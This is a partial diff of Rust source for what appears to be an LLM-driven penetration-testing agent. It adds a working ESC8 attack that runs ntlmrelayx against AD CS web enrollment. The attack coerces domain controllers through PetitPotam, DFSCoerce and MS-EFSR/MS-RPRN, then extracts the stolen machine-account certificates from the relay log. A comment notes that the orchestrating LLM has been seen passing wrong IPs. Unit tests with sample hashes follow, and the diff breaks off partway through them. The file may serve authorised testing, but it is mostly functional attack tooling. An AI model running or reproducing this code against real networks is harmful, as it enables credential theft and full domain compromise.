.arg_if(socks, "--socks") + .arg_if(socks, "-socks") .arg_if(interactive, "-i") .timeout_secs(120) .execute() .await } +/// Parsed + validated args for [`relay_and_coerce`]. Pulled into a struct so +/// the validation logic can be unit-tested without spawning subprocesses. 
+#[derive(Debug, Clone, PartialEq, Eq)]
+struct RelayCoerceConfig {
+    ca_host: String,
+    coerce_target: String,
+    attacker_ip: String,
+    coerce_user: Option<String>,
+    coerce_domain: String,
+    coerce_secret: Option<CoerceSecret>,
+    template: String,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+enum CoerceSecret {
+    Hash(String),
+    Password(String),
+}
+
+fn parse_relay_coerce_args(args: &Value) -> Result<RelayCoerceConfig> {
+    let ca_host = required_str(args, "ca_host")?;
+    // Accept legacy `target_dc` as an alias for backwards compat with state
+    // injected before the rename.
+    let coerce_target = optional_str(args, "coerce_target")
+        .or_else(|| optional_str(args, "target_dc"))
+        .ok_or_else(|| {
+            anyhow::anyhow!("relay_and_coerce: missing required argument 'coerce_target'")
+        })?;
+    let attacker_ip = required_str(args, "attacker_ip")?;
+    let coerce_user = optional_str(args, "coerce_user").filter(|s| !s.is_empty());
+    let coerce_domain = optional_str(args, "coerce_domain").unwrap_or("");
+    let coerce_hash = optional_str(args, "coerce_hash").filter(|s| !s.is_empty());
+    let coerce_password = optional_str(args, "coerce_password").filter(|s| !s.is_empty());
+    let template = optional_str(args, "template").unwrap_or("DomainController");
+
+    // Source ≠ target. Coercing the CA host itself triggers same-machine
+    // NTLM loopback rejection at IIS. Conservative literal compare — callers
+    // mixing hostname/IP across the two args still slip through, that's their
+    // problem to keep distinct.
+    if coerce_target == ca_host {
+        anyhow::bail!(
+            "relay_and_coerce: coerce_target ({coerce_target}) must differ from ca_host \
+             ({ca_host}); same-machine NTLM loopback protection blocks relayed auth. \
+             Coerce a different machine account (e.g. another DC) and relay it to this CA."
+        );
+    }
+
+    if coerce_user.is_some() && coerce_hash.is_none() && coerce_password.is_none() {
+        anyhow::bail!(
+            "relay_and_coerce: coerce_user provided without coerce_hash or coerce_password"
+        );
+    }
+
+    // Defensive check so a stray input can't smuggle a second arg into a
+    // child process via env propagation. Single-quote no longer matters
+    // (no shell), but we still reject it alongside newlines; neither ever
+    // belongs in a hash or hostname.
+    for (name, val) in [
+        ("ca_host", ca_host),
+        ("coerce_target", coerce_target),
+        ("attacker_ip", attacker_ip),
+        ("coerce_user", coerce_user.unwrap_or("")),
+        ("coerce_domain", coerce_domain),
+        ("template", template),
+    ] {
+        if val.contains('\n') || val.contains('\'') {
+            anyhow::bail!("{name} contains forbidden character (newline or single-quote)");
+        }
+    }
+
+    let coerce_secret = if let Some(h) = coerce_hash {
+        if h.contains('\n') || h.contains('\'') || h.contains(' ') {
+            anyhow::bail!("coerce_hash contains forbidden character");
+        }
+        Some(CoerceSecret::Hash(h.to_string()))
+    } else if let Some(p) = coerce_password {
+        if p.contains('\n') || p.contains('\'') {
+            anyhow::bail!("coerce_password contains forbidden character");
+        }
+        Some(CoerceSecret::Password(p.to_string()))
+    } else {
+        None
+    };
+
+    Ok(RelayCoerceConfig {
+        ca_host: ca_host.to_string(),
+        coerce_target: coerce_target.to_string(),
+        attacker_ip: attacker_ip.to_string(),
+        coerce_user: coerce_user.map(String::from),
+        coerce_domain: coerce_domain.to_string(),
+        coerce_secret,
+        template: template.to_string(),
+    })
+}
+
+// === Trait-based execution seam =====================================
+//
+// The phase-progression logic (spawn relay → run coerce phases → poll
+// log → extract cert) is exercised by unit tests via FakeCoerceProcs,
+// which scripts subprocess outcomes and relay-log writes. Production
+// uses RealCoerceProcs which wraps tokio::process::{Command,Child}.
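The argument checks above (source/target distinctness, user-without-secret) are simple enough to exercise in isolation. A minimal std-only reduction, where `validate` is a hypothetical stand-in for `parse_relay_coerce_args` and not part of the patch:

```rust
/// Hypothetical reduction of two checks from parse_relay_coerce_args:
/// the coerced host must differ from the relay target, and supplying a
/// user without any secret is rejected.
fn validate(
    ca_host: &str,
    coerce_target: &str,
    user: Option<&str>,
    secret: Option<&str>,
) -> Result<(), String> {
    if coerce_target == ca_host {
        return Err(format!(
            "coerce_target ({coerce_target}) must differ from ca_host ({ca_host})"
        ));
    }
    if user.is_some() && secret.is_none() {
        return Err("coerce_user provided without a secret".into());
    }
    Ok(())
}

fn main() {
    assert!(validate("10.0.0.1", "10.0.0.2", None, None).is_ok());
    assert!(validate("10.0.0.1", "10.0.0.1", None, None).is_err());
    assert!(validate("10.0.0.1", "10.0.0.2", Some("alice"), None).is_err());
    assert!(validate("10.0.0.1", "10.0.0.2", Some("alice"), Some("hash")).is_ok());
}
```

The same four cases appear as `#[tokio::test]` functions later in this patch, driven through the real parser.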
+
+trait RelayHandle {
+    fn pid(&self) -> u32;
+    /// Sleep `settle` (giving the process time to bind ports), then check
+    /// whether it has already exited. Returns the exit code if so.
+    async fn settle_then_try_wait(&mut self, settle: Duration) -> Option<i32>;
+    async fn kill_and_wait(&mut self, timeout: Duration);
+}
+
+trait CoerceProcs {
+    type Handle: RelayHandle;
+    fn is_local_ip(&self, ip: &str) -> bool;
+    fn list_local_ips(&self) -> Vec<String>;
+    fn which_binary(&self, name: &str) -> bool;
+    async fn cleanup_stale_listeners(&self, workdir: &Path);
+    async fn spawn_relay(
+        &self,
+        target_url: &str,
+        template: &str,
+        relay_log: &Path,
+        workdir: &Path,
+    ) -> Result<Self::Handle>;
+    async fn run_phase(
+        &self,
+        coerce_log: &Path,
+        header: &str,
+        bin: &str,
+        args: &[&str],
+        cwd: &Path,
+        timeout_secs: u64,
+    );
+}
+
+#[derive(Debug, Clone, Copy)]
+struct RunOptions {
+    relay_settle: Duration,
+    poll_interval: Duration,
+    poll_phase_1: Duration,
+    poll_phase_2: Duration,
+    poll_phase_3: Duration,
+    post_capture_settle: Duration,
+    relay_kill_timeout: Duration,
+    keep_workdir_on_capture: bool,
+    /// Whether to acquire the host-wide TCP-port mutex before spawning the
+    /// relay. Production sets this to `true` to serialize concurrent
+    /// invocations across worker processes; unit tests set `false` so they
+    /// can run in parallel without fighting over the loopback sentinel port.
+    acquire_host_lock: bool,
+}
+
+impl RunOptions {
+    fn production() -> Self {
+        Self {
+            relay_settle: Duration::from_secs(3),
+            poll_interval: Duration::from_millis(500),
+            poll_phase_1: Duration::from_secs(8),
+            poll_phase_2: Duration::from_secs(10),
+            poll_phase_3: Duration::from_secs(8),
+            post_capture_settle: Duration::from_secs(5),
+            relay_kill_timeout: Duration::from_secs(5),
+            keep_workdir_on_capture: true,
+            acquire_host_lock: true,
+        }
+    }
+}
+
+// --- Real (production) implementation -------------------------------
+
+struct RealCoerceProcs;
+
+struct RealRelayHandle {
+    child: Child,
+}
+
+impl RelayHandle for RealRelayHandle {
+    fn pid(&self) -> u32 {
+        self.child.id().unwrap_or(0)
+    }
+
+    async fn settle_then_try_wait(&mut self, settle: Duration) -> Option<i32> {
+        sleep(settle).await;
+        match self.child.try_wait() {
+            Ok(Some(status)) => Some(status.code().unwrap_or(-1)),
+            _ => None,
+        }
+    }
+
+    async fn kill_and_wait(&mut self, timeout: Duration) {
+        let _ = self.child.start_kill();
+        let _ = tokio::time::timeout(timeout, self.child.wait()).await;
+    }
+}
+
+impl CoerceProcs for RealCoerceProcs {
+    type Handle = RealRelayHandle;
+
+    fn is_local_ip(&self, ip: &str) -> bool {
+        use std::net::{IpAddr, UdpSocket};
+        let parsed: IpAddr = match ip.parse() {
+            Ok(addr) => addr,
+            Err(_) => return false,
+        };
+        if parsed.is_loopback() || parsed.is_unspecified() || parsed.is_multicast() {
+            return false;
+        }
+        UdpSocket::bind((parsed, 0)).is_ok()
+    }
+
+    fn list_local_ips(&self) -> Vec<String> {
+        use std::net::UdpSocket;
+        let mut out = Vec::new();
+        if let Ok(sock) = UdpSocket::bind("0.0.0.0:0") {
+            if sock.connect("8.8.8.8:53").is_ok() {
+                if let Ok(local) = sock.local_addr() {
+                    let ip = local.ip().to_string();
+                    if !ip.starts_with("127.") {
+                        out.push(ip);
+                    }
+                }
+            }
+        }
+        out
+    }
+
+    fn which_binary(&self, name: &str) -> bool {
+        let Some(path) = std::env::var_os("PATH") else {
+            return false;
+        };
+        for dir in std::env::split_paths(&path) {
+            if dir.join(name).is_file() {
+                return true;
+            }
+        }
+        false
+    }
+
+    async fn cleanup_stale_listeners(&self, workdir: &Path) {
+        // pkill returns 1 if no match — fine; we want at-most-once semantics,
+        // not strict success. ntlmrelayx surfaces RELAY_BIND_FAILED later if a
+        // non-impacket process is still holding the ports.
+        for pat in [
+            "impacket-ntlmrelayx",
+            "ntlmrelayx.py",
+            "Responder.py",
+            "impacket-petitpotam",
+        ] {
+            let _ = TokioCommand::new("pkill")
+                .arg("-f")
+                .arg(pat)
+                .stdin(Stdio::null())
+                .stdout(Stdio::null())
+                .stderr(Stdio::null())
+                .current_dir(workdir)
+                .status()
+                .await;
+        }
+        sleep(Duration::from_millis(500)).await;
+    }
+
+    async fn spawn_relay(
+        &self,
+        target_url: &str,
+        template: &str,
+        relay_log: &Path,
+        workdir: &Path,
+    ) -> Result<Self::Handle> {
+        let relay_log_out = std::fs::File::create(relay_log).context("create relay.log")?;
+        let relay_log_err = relay_log_out.try_clone().context("dup relay.log fd")?;
+        // ntlmrelayx writes captured PFXs (and BloodHound JSON) relative to its
+        // own CWD. Pin it to the workdir so artifacts land where we can find
+        // them (and not in the worker's `/`). --keep-relaying prevents the
+        // first inbound (often anonymous) connection from causing "All targets
+        // processed!" before the real coerced DC calls back.
+        let child = TokioCommand::new("impacket-ntlmrelayx")
+            .arg("-t")
+            .arg(target_url)
+            .arg("--adcs")
+            .arg("--template")
+            .arg(template)
+            .arg("-smb2support")
+            .arg("--keep-relaying")
+            .arg("--no-da")
+            .arg("--no-acl")
+            .arg("--no-validate-privs")
+            .arg("--no-dump")
+            .current_dir(workdir)
+            .stdin(Stdio::piped())
+            .stdout(Stdio::from(relay_log_out))
+            .stderr(Stdio::from(relay_log_err))
+            .kill_on_drop(true)
+            .spawn()
+            .context("failed to spawn impacket-ntlmrelayx (is it installed?)")?;
+        Ok(RealRelayHandle { child })
+    }
+
+    async fn run_phase(
+        &self,
+        coerce_log: &Path,
+        header: &str,
+        bin: &str,
+        args: &[&str],
+        cwd: &Path,
+        timeout_secs: u64,
+    ) {
+        let mut cmd = TokioCommand::new(bin);
+        for a in args {
+            cmd.arg(a);
+        }
+        cmd.current_dir(cwd).stdin(Stdio::null());
+        let timeout = Duration::from_secs(timeout_secs);
+        match tokio::time::timeout(timeout, cmd.output()).await {
+            Ok(Ok(out)) => append_output(coerce_log, header, &out).await,
+            Ok(Err(e)) => append_error(coerce_log, header, &format!("spawn failed: {e}")).await,
+            Err(_) => {
+                append_error(
+                    coerce_log,
+                    header,
+                    &format!("timed out after {timeout_secs}s"),
+                )
+                .await
+            }
+        }
+    }
+}
+
+/// Composite ESC8 relay+coerce. Starts ntlmrelayx targeting AD CS web
+/// enrollment, coerces a chosen machine account over unauth PetitPotam →
+/// authenticated DFSCoerce → MS-EFSR → MS-RPRN until the relay log shows a
+/// cert capture, then decodes the base64 cert from the log and emits
+/// deterministic `PFX_FILE=` / `RELAYED_USER=` markers for the parser.
+///
+/// Required args: `ca_host`, `coerce_target`, `attacker_ip`.
+/// Optional args: `coerce_user`, `coerce_domain`, `coerce_hash` /
+/// `coerce_password`, `template` (default "DomainController").
+///
+/// **Source ≠ target.** `coerce_target` MUST differ from `ca_host`. When CA
+/// is co-located on the DC (common in lab AD), coercing the same host triggers
+/// Microsoft's same-machine NTLM loopback protection and ADCS rejects the
+/// relayed auth. Coerce a different DC or member instead — e.g. a child-DC
+/// machine account relayed to the parent forest's CA.
+///
+/// Phase 1 always runs unauthenticated PetitPotam (works against unpatched
+/// DCs without creds). Phase 2 runs authenticated DFSCoerce. Phase 3 runs
+/// `coercer` for MS-EFSR / MS-RPRN. Phases 2/3 are skipped when no creds
+/// are supplied.
+pub async fn relay_and_coerce(args: &Value) -> Result<ToolOutput> {
+    let cfg = parse_relay_coerce_args(args)?;
+    run_relay_and_coerce(cfg, &RealCoerceProcs, RunOptions::production()).await
+}
+
+/// Host-wide TCP-port mutex. ntlmrelayx binds 0.0.0.0:445 (and 80) globally;
+/// two relay invocations racing on the same host produce
+/// `OSError [Errno 98] Address already in use` and the loser silently fails
+/// to relay anything. The orchestrator dispatches `relay_and_coerce` from
+/// multiple workers (separate processes), so an intra-process Mutex is not
+/// enough — we need cross-process serialization.
+///
+/// Trick: bind a TCP listener to a fixed loopback port (41445). The kernel
+/// guarantees only one process can hold the port at a time, and releases it
+/// automatically when the listener is dropped or the process dies. No file
+/// cleanup required, no stale-lock races. Hold the returned listener for the
+/// lifetime of the relay; drop it (implicitly) to release.
+const RELAY_LOCK_PORT: u16 = 41445;
+
+#[cfg(test)]
+thread_local! {
+    /// When set on a test thread, [`try_acquire_relay_lock`] uses the real
+    /// host-wide port instead of bypassing it. The contention test sets this
+    /// so its assertion that a held port returns `None` still works; all other
+    /// tests leave it false so they don't fight over the single port.
+    static USE_REAL_RELAY_LOCK_IN_TEST: std::cell::Cell<bool> =
+        const { std::cell::Cell::new(false) };
+}
+
+fn try_acquire_relay_lock() -> Option<TcpListener> {
+    #[cfg(test)]
+    {
+        // Default test behavior: bind to an ephemeral loopback port so tests
+        // never contend on the single host-wide sentinel. Tests that need to
+        // exercise contention semantics opt in via USE_REAL_RELAY_LOCK_IN_TEST.
+        if !USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.get()) {
+            return TcpListener::bind("127.0.0.1:0").ok();
+        }
+    }
+    use std::net::SocketAddr;
+    let addr: SocketAddr = ([127, 0, 0, 1], RELAY_LOCK_PORT).into();
+    TcpListener::bind(addr).ok()
+}
+
+async fn run_relay_and_coerce<P: CoerceProcs>(
+    cfg: RelayCoerceConfig,
+    procs: &P,
+    opts: RunOptions,
+) -> Result<ToolOutput> {
+    // attacker_ip MUST be one of our local interface IPs. The LLM has been
+    // observed to misread context and pass a *target* host (e.g. CASTELBLACK)
+    // as the attacker IP, which makes the relay listener bind to 0.0.0.0 but
+    // PetitPotam tells the coerced DC to authenticate back to the wrong host
+    // — auth never reaches the relay. Fail fast with a clear error.
+    if !procs.is_local_ip(&cfg.attacker_ip) {
+        anyhow::bail!(
+            "relay_and_coerce: attacker_ip ({}) is not a local interface IP. \
+             Pass the listener_ip / attacker_ip exactly as supplied by the \
+             orchestrator payload — this MUST be the attacker host's IP \
+             (where the relay listener binds), NOT a target machine. \
+             Available local IPs: {}",
+            cfg.attacker_ip,
+            procs.list_local_ips().join(", "),
+        );
+    }
+
+    // Acquire the host-wide relay lock BEFORE any teardown of stale listeners.
+    // If another relay_and_coerce invocation is in flight on this host, refuse
+    // immediately with RELAY_BIND_BUSY rather than racing it for port 445 and
+    // both losing — the dispatcher's dedup will retry on the next tick.
+    //
+    // Must come before `cleanup_stale_listeners`; otherwise we'd pkill the
+    // in-flight peer's ntlmrelayx and corrupt its capture mid-flight.
+ // + // The listener is held in `_relay_lock` so the kernel keeps the port bound + // for the whole function body. Drop on return automatically releases it. + let _relay_lock = if opts.acquire_host_lock { + match try_acquire_relay_lock() { + Some(l) => Some(l), + None => { + return Ok(ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\nAnother relay_and_coerce is active on this \ + host (loopback port {RELAY_LOCK_PORT} held). Refusing to race \ + for ntlmrelayx port 445; retry after the in-flight relay \ + completes." + ), + stderr: String::new(), + exit_code: Some(0), + success: false, + }); + } + } + } else { + None + }; + + let tempdir = tempfile::Builder::new() + .prefix("ares_relay_") + .tempdir() + .context("failed to create relay workdir")?; + let workdir = tempdir.path().to_path_buf(); + let relay_log = workdir.join("relay.log"); + let coerce_log = workdir.join("coerce.log"); + + procs.cleanup_stale_listeners(&workdir).await; + + let target_url = format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host); + let mut relay = procs + .spawn_relay(&target_url, &cfg.template, &relay_log, &workdir) + .await?; + + // Give it a moment to bind ports; if it died, surface RELAY_BIND_FAILED. + if let Some(code) = relay.settle_then_try_wait(opts.relay_settle).await { + let log = tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(); + return Ok(ToolOutput { + stdout: format!("RELAY_BIND_FAILED\n{log}"), + stderr: String::new(), + exit_code: Some(code), + success: false, + }); + } + + let mut summary = format!("RELAY_PID={}\n", relay.pid()); + let mut captured_via: Option<&'static str> = None; + + // --- Phase 1: unauthenticated PetitPotam --- + // Distros differ: Kali ships `petitpotam` (symlink), pip ships + // `impacket-petitpotam`. Try in order, log if both missing. 
+    summary.push_str("=== Phase 1: unauth PetitPotam ===\n");
+    let petit_bin = ["petitpotam", "impacket-petitpotam"]
+        .into_iter()
+        .find(|b| procs.which_binary(b))
+        .unwrap_or("petitpotam");
+    // PetitPotam positional args are `target path` (where `target` is the
+    // machine being coerced and `path` is the UNC the target authenticates
+    // back to). Reversing them coerces the attacker host onto itself.
+    let unc_path = format!("\\\\{}\\share\\x", cfg.attacker_ip);
+    let p1_args: [&str; 2] = [cfg.coerce_target.as_str(), unc_path.as_str()];
+    procs
+        .run_phase(
+            &coerce_log,
+            "Phase 1: unauth PetitPotam",
+            petit_bin,
+            &p1_args,
+            &workdir,
+            25,
+        )
+        .await;
+    if poll_for_cert(&relay_log, opts.poll_phase_1, opts.poll_interval).await {
+        captured_via = Some("unauth_petitpotam");
+    }
+
+    // --- Phase 2: authenticated DFSCoerce ---
+    if captured_via.is_none() && cfg.coerce_user.is_some() {
+        summary.push_str("=== Phase 2: authenticated DFSCoerce (MS-DFSNM) ===\n");
+        let user = cfg.coerce_user.as_deref().unwrap();
+        let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
+        let mut a: Vec<&str> = vec!["-u", user, "-d", cfg.coerce_domain.as_str()];
+        for s in &secret_args {
+            a.push(s.as_str());
+        }
+        a.push(cfg.attacker_ip.as_str());
+        a.push(cfg.coerce_target.as_str());
+        procs
+            .run_phase(
+                &coerce_log,
+                "Phase 2: DFSCoerce",
+                "dfscoerce",
+                &a,
+                &workdir,
+                25,
+            )
+            .await;
+        if poll_for_cert(&relay_log, opts.poll_phase_2, opts.poll_interval).await {
+            captured_via = Some("MS-DFSNM");
+        }
+    }
+
+    // --- Phase 3: coercer over MS-EFSR / MS-RPRN ---
+    if captured_via.is_none() && cfg.coerce_user.is_some() {
+        let user = cfg.coerce_user.as_deref().unwrap();
+        let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
+        for proto in ["MS-EFSR", "MS-RPRN"] {
+            summary.push_str(&format!(
+                "=== Phase 3: authenticated coerce via {proto} ===\n"
+            ));
+            let mut a: Vec<&str> = vec![
+                "coerce",
+                "-u",
+                user,
+                "-d",
+                cfg.coerce_domain.as_str(),
+                "-t",
+                cfg.coerce_target.as_str(),
+                "-l",
+                cfg.attacker_ip.as_str(),
+                "--filter-protocol-name",
+                proto,
+                "--auth-type",
+                "smb",
+                "--always-continue",
+            ];
+            for s in &secret_args {
+                a.push(s.as_str());
+            }
+            procs
+                .run_phase(
+                    &coerce_log,
+                    &format!("Phase 3: {proto}"),
+                    "coercer",
+                    &a,
+                    &workdir,
+                    25,
+                )
+                .await;
+            if poll_for_cert(&relay_log, opts.poll_phase_3, opts.poll_interval).await {
+                captured_via = Some(proto);
+                break;
+            }
+        }
+    }
+
+    // Allow any in-flight ADCS request to finish writing the cert.
+    if captured_via.is_some() {
+        sleep(opts.post_capture_settle).await;
+    }
+
+    relay.kill_and_wait(opts.relay_kill_timeout).await;
+
+    // Extract cert from the relay log if captured. Two ntlmrelayx output
+    // shapes need handling:
+    //   1. `--adcs` (our path) — writes the PFX to disk and logs
+    //      "Writing PKCS#12 certificate to ./<user>.pfx" + earlier
+    //      "Authenticating connection from .../<user>$@ip" lines.
+    //   2. `--ldap` userCertificate — logs "Base64 certificate of user <user>:"
+    //      followed by the base64 blob on the next line. Kept as fallback.
+    let mut pfx_path: Option<PathBuf> = None;
+    let mut relayed_user: Option<String> = None;
+    if captured_via.is_some() {
+        let log = tokio::fs::read_to_string(&relay_log)
+            .await
+            .unwrap_or_default();
+
+        if let Some(cap) = extract_pfx_capture_from_log(&log) {
+            let bare = cap.pfx_basename.trim_start_matches("./");
+            let candidate = workdir.join(bare);
+            if tokio::fs::metadata(&candidate).await.is_ok() {
+                pfx_path = Some(candidate);
+                relayed_user = Some(cap.user);
+            }
+        }
+
+        if pfx_path.is_none() {
+            if let Some((user, b64)) = extract_cert_from_log(&log) {
+                let pfx = workdir.join(format!("{user}.pfx"));
+                let cleaned: String = b64.chars().filter(|c| !c.is_whitespace()).collect();
+                if let Ok(bytes) = base64::engine::general_purpose::STANDARD.decode(&cleaned) {
+                    if !bytes.is_empty() && tokio::fs::write(&pfx, &bytes).await.is_ok() {
+                        pfx_path = Some(pfx);
+                        relayed_user = Some(user);
+                    }
+                }
+            }
+        }
+    }
+
+    let mut stdout = summary;
+    if let Some(via) = captured_via {
+        stdout.push_str(&format!("CERT_CAPTURED_VIA={via}\n"));
+    }
+    if let (Some(p), Some(u)) = (pfx_path.as_ref(), relayed_user.as_ref()) {
+        stdout.push_str(&format!("PFX_FILE={}\n", p.display()));
+        stdout.push_str(&format!("RELAYED_USER={u}\n"));
+    }
+    stdout.push_str("=== RELAY LOG ===\n");
+    stdout.push_str(
+        &tokio::fs::read_to_string(&relay_log)
+            .await
+            .unwrap_or_default(),
+    );
+    stdout.push_str("=== COERCE LOG ===\n");
+    stdout.push_str(
+        &tokio::fs::read_to_string(&coerce_log)
+            .await
+            .unwrap_or_default(),
+    );
+
+    let success = pfx_path.is_some();
+
+    // Persist workdir if we resolved a PFX OR if a cert was captured (so
+    // operators can debug extraction failures without losing the artifact).
+    if (success || captured_via.is_some()) && opts.keep_workdir_on_capture {
+        let _ = tempdir.keep();
+    }
+
+    Ok(ToolOutput {
+        stdout,
+        stderr: String::new(),
+        exit_code: Some(if success { 0 } else { 1 }),
+        success,
+    })
+}
+
+fn coerce_secret_args(secret: Option<&CoerceSecret>) -> Vec<String> {
+    match secret {
+        Some(CoerceSecret::Hash(h)) => vec!["-hashes".into(), format!(":{h}")],
+        Some(CoerceSecret::Password(p)) => vec!["-p".into(), p.clone()],
+        None => Vec::new(),
+    }
+}
+
+async fn append_output(path: &Path, header: &str, output: &std::process::Output) {
+    use tokio::io::AsyncWriteExt;
+    if let Ok(mut f) = tokio::fs::OpenOptions::new()
+        .create(true)
+        .append(true)
+        .open(path)
+        .await
+    {
+        let _ = f.write_all(b"=== ").await;
+        let _ = f.write_all(header.as_bytes()).await;
+        let _ = f.write_all(b" ===\n").await;
+        let _ = f.write_all(&output.stdout).await;
+        let _ = f.write_all(&output.stderr).await;
+        let _ = f.write_all(b"\n").await;
+    }
+}
+
+async fn append_error(path: &Path, header: &str, msg: &str) {
+    use tokio::io::AsyncWriteExt;
+    if let Ok(mut f) = tokio::fs::OpenOptions::new()
+        .create(true)
+        .append(true)
+        .open(path)
+        .await
+    {
+        let _ = f.write_all(b"=== ").await;
+        let _ = f.write_all(header.as_bytes()).await;
+        let _ = f.write_all(b" ===\n[ERROR] ").await;
+        let _ = f.write_all(msg.as_bytes()).await;
+        let _ = f.write_all(b"\n").await;
+    }
+}
+
+async fn poll_for_cert(relay_log: &Path, max: Duration, interval: Duration) -> bool {
+    let deadline = Instant::now() + max;
+    loop {
+        if let Ok(s) = tokio::fs::read_to_string(relay_log).await {
+            // `--adcs` writes "GOT CERTIFICATE! ID <n>" then "Writing PKCS#12 …".
+            // `--ldap` userCertificate writes "Base64 certificate of user …".
+            if s.contains("Base64 certificate of user")
+                || s.contains("GOT CERTIFICATE!")
+                || s.contains("Writing PKCS#12 certificate to")
+            {
+                return true;
+            }
+        }
+        let now = Instant::now();
+        if now >= deadline {
+            return false;
+        }
+        let wait = std::cmp::min(interval, deadline - now);
+        sleep(wait).await;
+    }
+}
+
+/// Captured-cert metadata for the `--adcs` path: ntlmrelayx writes the PFX to
+/// disk relative to its CWD and logs the path.
+#[derive(Debug, Clone, PartialEq, Eq)]
+struct PfxCapture {
+    user: String,
+    pfx_basename: String,
+}
+
+/// Walk the relay log, pair the most-recent authenticating-as-user line with
+/// the most-recent "Writing PKCS#12 certificate to <path>" line. Returns None
+/// if either marker is missing.
+fn extract_pfx_capture_from_log(log: &str) -> Option<PfxCapture> {
+    let mut last_user: Option<String> = None;
+    let mut last_pfx: Option<String> = None;
+
+    for line in log.lines() {
+        // "[*] Authenticating against http://... as DOMAIN/USER$ SUCCEED"
+        // "[*] SMBD-Thread-N: Connection from DOMAIN/USER$@ip controlled, attacking..."
+        // Both shapes appear depending on flow; pull the user after the slash.
+        if let Some(user) = parse_relayed_user(line) {
+            last_user = Some(user);
+        }
+        // "[*] Writing PKCS#12 certificate to ./DC01.pfx"
+        if let Some(idx) = line.find("Writing PKCS#12 certificate to ") {
+            let after = &line[idx + "Writing PKCS#12 certificate to ".len()..];
+            let path = after.split_whitespace().next().unwrap_or("");
+            if !path.is_empty() {
+                last_pfx = Some(path.to_string());
+            }
+        }
+    }
+
+    match (last_user, last_pfx) {
+        (Some(u), Some(p)) => Some(PfxCapture {
+            user: u,
+            pfx_basename: p,
+        }),
+        // If we got a PFX path but no user, fall back to the file's basename
+        // (ntlmrelayx names the PFX after the user).
+        (None, Some(p)) => {
+            let base = std::path::Path::new(p.trim_start_matches("./"))
+                .file_stem()
+                .and_then(|s| s.to_str())
+                .unwrap_or("relayed")
+                .to_string();
+            Some(PfxCapture {
+                user: base,
+                pfx_basename: p,
+            })
+        }
+        _ => None,
+    }
+}
+
+/// Pull a relayed username out of a line that looks like
+/// "DOMAIN/USERNAME$@target" or "DOMAIN/USERNAME@target". Returns the bare
+/// username including any trailing `$`.
+fn parse_relayed_user(line: &str) -> Option<String> {
+    let at_idx = line.find('@')?;
+    let prefix = &line[..at_idx];
+    // Walk backwards from '@' to the slash that splits domain/user.
+    let user_start = prefix.rfind('/')? + 1;
+    let candidate: &str = prefix[user_start..]
+        .split_terminator(|c: char| c.is_whitespace())
+        .next()?;
+    if candidate.is_empty() {
+        return None;
+    }
+    // Heuristic — usernames here are word chars + an optional trailing $.
+    if !candidate
+        .chars()
+        .all(|c| c.is_alphanumeric() || c == '$' || c == '_' || c == '-' || c == '.')
+    {
+        return None;
+    }
+    Some(candidate.to_string())
+}
+
+/// Parse the relay.log for the LAST captured cert. ntlmrelayx prints
+/// `Base64 certificate of user <user>:` followed by the base64 blob on the
+/// next non-empty line. Returns (user, base64_blob).
+fn extract_cert_from_log(log: &str) -> Option<(String, String)> {
+    let mut last_user: Option<String> = None;
+    let mut last_b64: Option<String> = None;
+    let mut pending_user: Option<String> = None;
+
+    for line in log.lines() {
+        if let Some(idx) = line.find("Base64 certificate of user ") {
+            let after = &line[idx + "Base64 certificate of user ".len()..];
+            let name = after
+                .split_whitespace()
+                .next()
+                .unwrap_or("")
+                .trim_end_matches(':');
+            if !name.is_empty() {
+                pending_user = Some(name.to_string());
+            }
+            continue;
+        }
+        if let Some(user) = &pending_user {
+            let trimmed = line.trim();
+            if !trimmed.is_empty() {
+                last_user = Some(user.clone());
+                last_b64 = Some(trimmed.to_string());
+                pending_user = None;
+            }
+        }
+    }
+
+    match (last_user, last_b64) {
+        (Some(u), Some(b)) => Some((u, b)),
+        _ => None,
+    }
+}
+
 /// Relay captured NTLM authentication to multiple targets.
 ///
 /// Optional args: `targets_file`, `target_ips` (comma-separated), `dump_sam`
@@ -336,6 +1209,623 @@ mod tests {
         assert!(ntlmrelayx_to_smb(&args).await.is_ok());
     }
 
+    #[tokio::test]
+    async fn relay_and_coerce_requires_secret() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "coerce_user": "alice",
+            "coerce_domain": "contoso.local"
+        });
+        let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+        assert!(err.contains("coerce_hash") || err.contains("coerce_password"));
+    }
+
+    #[tokio::test]
+    async fn relay_and_coerce_rejects_quote_in_inputs() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "coerce_user": "alice",
+            "coerce_domain": "contoso.local",
+            "coerce_password": "p'ass"
+        });
+        let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+        assert!(err.contains("forbidden"));
+    }
+
+    #[tokio::test]
+    async fn relay_and_coerce_rejects_same_host() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.10",
+            "attacker_ip": "192.168.58.100",
+            "coerce_user": "alice",
+            "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+            "coerce_domain": "contoso.local"
+        });
+        let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+        assert!(err.contains("must differ") || err.contains("loopback"));
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_accepts_legacy_target_dc_alias() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "target_dc": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "coerce_user": "alice",
+            "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+            "coerce_domain": "contoso.local"
+        });
+        let cfg = super::parse_relay_coerce_args(&args).expect("legacy alias should parse");
+        assert_eq!(cfg.coerce_target, "192.168.58.20");
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_with_hash() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "coerce_user": "alice",
+            "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+            "coerce_domain": "contoso.local"
+        });
